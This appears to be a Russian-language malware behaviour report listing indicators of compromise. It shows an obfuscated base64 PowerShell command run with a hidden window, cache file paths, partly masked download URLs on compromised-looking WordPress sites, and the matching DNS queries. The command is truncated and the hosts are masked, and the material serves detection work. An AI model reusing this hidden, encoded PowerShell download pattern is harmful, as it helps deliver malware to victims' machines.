Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADcANwA2ADgANQAwADYAPQAnAG0AMAA3ADcAXwA5ACcAOwAkAFUAOQA3ADcAMQA1ADgAIAA9ACAAJwA1ADcAOQAnADsAJAB0ADMAMAAwADYANAAzADIAPQAnAFEAMAA3ADEAMAAxADUAJwA7ACQARwA3ADMAMgA4ADMANwA9ACQAZQBuAHYAOgB...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://gs##ow.com/wp-content/z768/
- http://mu#####spodorosario.com/wp-includes/6r21947/
- http://th######ppablesummit.com/wp-admin/w4bsb1t03/
- http://nu#####radatacenter.com/wp-content/upgrade/g2/
- http://bl##.nakiol.net/wp-content/f38/
- DNS ASK gs##ow.com
- DNS ASK mu#####spodorosario.com
- DNS ASK th######ppablesummit.com
- DNS ASK nu#####radatacenter.com
- DNS ASK bl##.nakiol.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADcANwA2ADgANQAwADYAPQAnAG0AMAA3ADcAXwA5ACcAOwAkAFUAOQA3ADcAMQA1ADgAIAA9ACAAJwA1ADcAOQAnADsAJAB0ADMAMAAwADYANAAzADIAPQAnAFEAMAA3ADEAMAAxADUAJwA7ACQARwA3ADMAMgA4ADMANwA9ACQAZQBuAHYAOgB...' (со скрытым окном)